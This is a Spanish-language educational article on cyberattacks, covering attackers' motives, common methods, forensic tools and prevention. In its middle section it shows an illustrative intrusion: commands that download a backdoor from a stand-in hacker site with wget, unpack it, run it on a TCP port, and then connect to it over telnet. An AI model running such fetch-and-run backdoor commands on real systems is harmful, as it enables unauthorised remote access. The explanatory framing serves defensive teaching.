Cyberattack

Cyberattack

Los ciber ataques son actos en los cuales se cometen agravios, daños o perjuicios en contra de las personas o grupos de ellas, entidades o instituciones y que por lo general son ejecutados por medio de computadoras y a través de la Internet. No necesariamente pueden ser cometidos totalmente por estos medios, sino también a partir de los mismos.

Un ciber ataque puede estar dirigido a los equipos y sistemas de computación que se encuentran operando en la red a nivel mundial, o puede ser orientado hacia la información y los datos que son almacenados en bases de datos. Al dirigirse a los equipos y sistemas, pueden buscar la anulación del servicio que éstos prestan, en forma temporal o permanente, introduciendo algún tipo de elementos extraños en dichos sistemas que dificulten su operación normal. Los ataques contra los datos, por su parte, pueden ir desde el robo de los mismos con propósitos militares o comerciales. Ejemplos de estos casos son los robos de centavos de transacciones bancarias o la modificación de sitios Web con mensajes o figuras totalmente alejados del propósito original del sitio Web atacado.

Quienes y Causas:

En si, hay muchos motivos por los cuales se puede cometer diversos delitos informáticos. Una de sus principales causas es el factor económico. La mayoría de los delitos informáticos está orientada a conseguir claves, documentación o acceso a cuentas bancarias para sustraer la mayor cantidad de dinero posible para lo cual se utiliza diversos medios que se detallara más adelante. En algunas ocasiones el crimen tiene un alto grado de organización que existen organizaciones bien estructuradas que realizan estas operaciones en la red y están a la orden de diversos clientes que necesiten cualquier clase de información; en algunos casos si el cliente no esta satisfecho con la información, el dinero invertido es devuelto.

Otro motivo que también se utiliza para cometer ciberataques es con fines políticos para manifestar una acción de protesta. Las dos formas de acción política más común en Internet son los bombardeos y el asalto de webs. En el pasado estas webs se atacaban de forma selectiva hasta que llegó la moda del "mass web defacement", es decir, entrar directamente en los servidores que las alojan y asaltar decenas o cientos de un solo ataque, para dejar en todas el mismo mensaje de protesta.

Otro motivo importante para cometer ataques a través de las redes, es el ciberterrorismo. El ciberterrorismo puede ser definido como “el ataque ilícito o amenaza de ataque en contra de redes de computadoras y la información guardada en ellas, con la intención de intimidar o extorsionar”. Uno de los principales blancos de los ciberterroristas son las redes de computadoras que proveen servicios públicos, tales como sistemas de control de energía eléctrica, aeropuertos, redes de trenes, redes satelitales, sistemas financieros y de emergencia, etc. Para lograr esto, inundan el sistema con mensajes de correo electrónico para paralizarlo (esta forma de ataque se conoce como bomba de correo electrónico). Un buen ejemplo de bombardeo por correo electrónico sucedió en 1997, cuando defensores del grupo ETA crearon un sitio Web para el Periódico del País Vasco en un proveedor de servicios de Internet llamado Instituto de Comunicaciones Globales. Un grupo de personas quisieron obligar al ICG a quitar el sitio de ETA de la red, y para esto enviaron miles de correos electrónicos al proveedor de servicios de Internet, paralizándolo y eventualmente el ICG desistió y quito el sitio de la red.

El campo militar también es un motivo importante por lo cual se utiliza ciber ataques a los servidores de los países. Mediante estos ataques se puede obtener información acerca del poderío militar de ciertos países, obtener estrategias de defensa y de ataque y si se esta en un enfrentamiento bélico se puede irrumpir en los sistemas de los campos de batalla y alteren las órdenes que dan los comandantes a sus tropas. En algunos países como EEUU se esta adoptando ciertas medidas como la creación de un “comando cibernético” con el fin de contrarrestar los diversos ataques que se producen a sus servidores.

¿Cómo se realizan los ciber ataques?

Los ciberataques pueden presentarse de diferentes maneras. Estos son algunos ejemplos que se podrían citar:

• La propagación de virus informáticos.

• El envío masivo de correo no deseado o SPAM.

• La suplantación de los Remitentes de mensajes con la técnica Spoofing.

• El envío o ingreso subrepticio de archivos espías o Keyloggers.

• El uso de Troyanos para el control remoto de los sistemas o la sustracción de información.

• El uso de archivos BOT del IRC (Internet Relay Chat) para el control remoto de sistemas y sustracción de información.

• El uso de Rootkits para los mismos fines anteriores y daños irreversibles.

Spoofing: Hace referencia a la suplantación de identidad para fines maliciosos (en la mayoría de los casos) o de investigación; existen diferentes tipos como el IP spoofing, ARP spoofing, DNS spoofing, Web spoofing o e-mail spoofing.

El keylogger es un tipo de software que permite registrar las pulsaciones del teclado, es decir, lo que uno está tecleando para luego almacenar dicho registro y enviarlo a través de internet.

Asimismo, se debe señalar que existen dos niveles de realizar una intrusión: el nivel de acceso de sistema y el nivel de acceso de aplicación. El más importante es el nivel de acceso de sistema que es el más riesgoso y el más difícil de lograr. Consiste en que el intruso pueda tener control pleno de los recursos con los mismos privilegios y permisos que el propio administrador mediante un terminal remoto. Estos accesos se logran mediante algún servicio mal configurado, o de aplicaciones vulnerables que permitan la ejecución de código arbitrario en el server. Por ejemplo: si tenemos abierto un servicio telnet, o un SSH vulnerable, estamos dando al atacante una terminal de acceso para que simplemente comience a trabajar.

Un ejemplo: un intruso sabe que mediante un sendmail mal configurado, o un proFTPd tiene la posibilidad de ejecutar algunos comandos sobre la máquina:

wget http://www.sitiohacker.com/backdoor.tar.gz

tar -xvzpf ./backdoor.tar.gz

cd backdoor

./backdoor -p 10040

Primero, baja de internet un paquete comprimido conteniendo un software de intrusión. Luego este paquete se descomprime en el directorio actual el cual no tiene importancia. Posteriormente se mueve al directorio que ha sido creado tras descomprimir las herramientas. Por ultimo ejecuta un comando que pone a funcionar el servicio "backdoor" escuchando en el puerto TCP 10040.

Ahora el intruso, cómodamente y desde su máquina, puede hacer lo siguiente:

telnet 172.16.100.21 10040

...donde la IP del servidor atacado es 172.16.100.21, y 10040 es el puerto donde el hacker puso a funcionar su aplicación "backdoor". Ahora sí, el hacker tiene una terminal de acceso a nuestro sistema. Casi con la comodidad de estar en su propia PC. Luego, el intruso tratará de permanecer inadvertido hasta haber logrado su objetivo y haber sacado el máximo provecho posible.

Imagen tomada de: http://www.sott.net/articles/show/189398-Korea-and-US-DDoS-attacks-The-attacking-source-located-in-United-Kingdom

Observamos el diagrama de acceso del intruso que describe un caso en el que el “master server” se encuentra en U.K. Este server controla 8 servers y cada 3 minutos los servidores “zombies” seleccionan aleatoriamente uno de estos 8 servers para conectarse a ellos y recibir órdenes. En este caso, el blanco o target son los websites de Corea del Sur y Estados Unidos. Informática Forense:Un método muy provechoso para prevenir estos tipos de ciber ataques se logran mediante la Informática Forense. Esta se encarga de garantizar la protección y seguridad de la información y de las tecnologías que cuentan con esta. Para esto, recolectan datos de diversos medios digitales para luego examinarlos y esto permite que se llegue a una conclusión, es decir, si hay algún caso de ciber ataque o no, todo esto sin alterar los datos de origen. Cabe señalar que siempre deben hacerlo teniendo en cuenta los requerimientos legales para no violar la privacidad de ningún tercero y siempre recolectando las evidencias necesarias para que la justicia dictamine que de verdad esta ante un caso de ciber ataque. La investigación consta de cuatro pasos: • Identificación: En este paso se identifica el bien informático, su uso dentro de la red y el conjunto de objetos y/o pruebas que serán tomadas en cuenta como evidencia del ciber ataque.

• Preservación: Se revisa y se genera imágenes forenses con el fin de realizar el análisis. La duplicación de la información se realiza utilizando tecnología de punta para poder mantener la evidencia intacta.

• Análisis: Se empieza a estudiar las evidencias para obtener información de relevancia para el caso aplicando ciertas técnicas científicas y analíticas a los medios duplicados por medio del proceso forense para poder encontrar pruebas de ciertas conductas.

• Presentación: Es la exposición de toda la información que se obtuvo a partir del análisis para realizar el reporte y la presentación a los abogados.

Para seguir estos cuatro pasos se utilizan algunas herramientas como:

• ENCASE: Desarrollada por Guidance Software Inc. Permite asistir al especialista forense durante el análisis de un crimen digital. Software líder en el mercado.

• Marcado de documentos: Esta orientado a los casos de robo de información confidencial.

• Honeypot: Es una herramienta de seguridad informática utilizada para recoger información sobre los atacantes y sus técnicas.

• X-Ways Forensics

• Forensic Toolkit: Paquete de herramientas que analiza las especificaciones de ficheros en búsqueda de actividad no autorizada.

• SafeBack: Software utilizado para crear imagen-espejo (mirror-image) del disco duro.

Prevención:

Existen diversas soluciones para la prevención de ciber ataques; estas medidas de prevención pueden ser utilizando software como hardware. A continuación se detallará algunos ejemplos de medidas de prevención:

• Firewall perimetral: El objetivo del Firewall perimetral es impedir que se realicen conexiones entre la red corporativa e Internet que estén fuera de la política de seguridad de la compañía.

• Filtro de contenido: Es un programa diseñado para controlar qué contenido se permite mostrar, especialmente para restringir el acceso a ciertos materiales de la Web.

• Antispam: método para prevenir el "correo basura". Las técnicas antispam se pueden diferenciar en cuatro categorías: las que requieren acciones por parte humana; las que de manera automática son los mismos correos electrónicos los administradores; las que se automatizan por parte de los remitentes de correos electrónicos; las empleadas por los investigadores y funcionarios encargados de hacer cumplir las leyes.